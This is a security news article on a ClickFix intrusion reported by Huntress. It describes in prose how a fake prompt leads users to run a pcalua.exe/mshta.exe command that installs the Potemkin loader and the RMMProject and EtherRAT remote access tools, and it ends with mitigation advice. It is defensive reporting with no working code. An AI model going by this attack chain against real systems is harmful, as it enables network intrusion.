Hackers Exploit ClickFix to Deploy Remote Access Tools

Hackers Exploit ClickFix for Network Infiltration

In a recent cyber attack, hackers utilized a technique known as ClickFix to infiltrate a company’s network, affecting over 11 systems. The attackers managed to deploy two distinct remote access tools before detection, showcasing the severe risks posed by seemingly innocuous user prompts.

The ClickFix technique involves tricking users into entering a command into the Windows Run dialog via a misleading prompt on a compromised website. This tactic capitalizes on users’ tendency to follow authoritative-looking instructions, facilitating unauthorized access to systems.

Understanding the ClickFix Technique

Researchers at Huntress first identified this sophisticated attack in May 2026. They traced the intrusion from a single, unmonitored endpoint that lacked sufficient security measures, leading to a hands-on-keyboard attack across the entire network. The initial breach occurred when a user accessed a compromised site and executed a command using pcalua.exe, a legitimate Windows function.

This command initiated a script that covertly downloaded and installed an MSI package, unbeknownst to the user. The package included a custom loader named Potemkin, which established a connection to a command-and-control server, subsequently loading a remote access tool known as RMMProject directly into memory.

Advanced Malware Deployment

In addition to RMMProject, the attackers utilized EtherRAT, a Node.js-based backdoor that retrieves server addresses from the Ethereum blockchain. This makes it challenging to disrupt using conventional domain takedowns. The attack escalated with the deployment of EtherRAT across multiple hosts via WMIExec and SMBExec, overcoming defenses such as Windows Defender in the process.

The ClickFix attack chain commenced with a command exploiting pcalua.exe to proxy mshta.exe, which fetched a remote HTA file. This HTA payload downloaded and executed the MSI installer, inst24.msi, without user awareness. Potemkin was then installed in the user’s AppData folder, ensuring persistence through reboots by registering a startup key.

Mitigation and Preventive Measures

Huntress emphasized the importance of auditing endpoint coverage to prevent such intrusions. The attack began on a machine lacking a monitoring agent, underscoring the need for comprehensive endpoint protection. Disabling the Windows Run dialog via Group Policy can effectively block the ClickFix entry point, as the attack relies on user-initiated command execution.

Organizations are advised to monitor for cloudflared or altered copies on endpoints and treat any attempts to disable Windows Defender as high-confidence threat indicators. Huntress recommends maintaining rigorous security protocols and staying vigilant to prevent similar breaches in the future.

Conclusion

This incident highlights the sophistication of modern cyber threats and the necessity for robust security measures. By understanding the mechanics of attacks like ClickFix, organizations can better prepare and protect their networks from similar exploits. Continuous monitoring and updating of security practices remain crucial in safeguarding against evolving threats.